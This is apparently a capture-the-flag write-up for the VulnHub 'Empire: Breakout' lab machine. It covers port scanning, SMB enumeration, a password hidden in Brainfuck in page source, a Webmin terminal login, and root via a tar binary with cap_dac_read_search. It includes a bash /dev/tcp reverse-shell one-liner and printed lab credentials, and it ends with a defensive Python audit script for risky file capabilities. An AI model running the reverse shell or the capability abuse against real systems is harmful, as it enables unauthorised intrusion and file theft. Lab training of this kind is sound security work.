VulnHub: Empire: Breakout

Today we will take a look at VulnHub: Breakout. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC --open
STATE SERVICE     VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
  • Enum4linux

Command: enum4linux -a

We found a username here.

  • Web

If we look at the bottom of the page’s source code, we see text encoded in Brainfuck (an esoteric programming language, not an encryption algorithm), together with this comment:


don't worry no one will get here, it's safe to share with you my access. Its encrypted :)



If we decode it, we get the password.

  • Reverse Shell

When we look at port 20000, it redirects us to the admin panel with a link.

Username: cyber
Password: .2uqPEfj3D<P'a-3

Once logged in, there is a terminal icon on the bottom left. With it we can run commands. I’ll get a reverse shell.

bash -i >& /dev/tcp/YourIP/1234 0>&1
  • Root

Command: getcap -r / 2>/dev/null

/home/cyber/tar cap_dac_read_search=ep
cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak
cyber@breakout:~$ ./tar -xvf old_pass
cyber@breakout:~$ cat var/backups/.old_pass.bak
cyber@breakout:~$ su root

And now we are root.
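
The root step works because a copy of tar in a home directory carries cap_dac_read_search, which lets it read any file regardless of permissions. The script below is an added example, not part of the original writeup: it parses getcap -r output in both formats libcap has printed and flags risky capabilities in a binary's permitted set. The RISKY selection and the TRUSTED_DIRS list are this example's assumptions, and every sample line except /home/cyber/tar is constructed.

```python
import re

# Capabilities that bypass file permissions or lead directly to root.
# This selection is an assumption of the example, not an exhaustive list.
RISKY = {
    "cap_dac_read_search": "reads any file, ignoring permissions",
    "cap_dac_override": "reads and writes any file, ignoring permissions",
    "cap_setuid": "can switch to UID 0",
    "cap_sys_admin": "broad administrative access",
    "cap_sys_ptrace": "can inspect and control other processes",
    "cap_sys_module": "can load kernel modules",
    "all": "every capability granted",
}
# Package-managed locations (assumed); anything else is treated as unexpected.
TRUSTED_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/bin/", "/sbin/")

# Accepts "/path cap_x=ep" (newer libcap) and "/path = cap_x+ep" (older libcap).
# Assumes paths without whitespace.
LINE = re.compile(r"^(/\S*)\s+(?:=\s+)?(.+)$")
CLAUSE = re.compile(r"^([a-z0-9_,]*)[=+]([eip]*)$")

def audit(getcap_output):
    """Return (severity, path, capability, reason) for each risky permitted capability."""
    findings = []
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        path, spec = m.groups()
        for clause in spec.split():
            c = CLAUSE.match(clause)
            if not c or "p" not in c.group(2):
                continue  # skip unparsable clauses and ones that leave the permitted set empty
            names = c.group(1).split(",") if c.group(1) else ["all"]
            for name in names:
                if name in RISKY:
                    sev = "review" if path.startswith(TRUSTED_DIRS) else "high"
                    findings.append((sev, path, name, RISKY[name]))
    return findings

# Constructed sample; only the /home/cyber/tar line comes from the writeup.
SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/opt/tools/python3 cap_setuid,cap_net_bind_service=ep
/usr/sbin/backup-agent cap_dac_read_search=i
/usr/bin/dumper = cap_dac_override+ep
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(*finding, sep="  ")
```

A "high" finding marks a risky capability on a binary outside the package-managed directories; clearing it with setcap -r on the file removes the privilege.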

“If you have any questions or comments, please do not hesitate to write. Have a good day.”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.

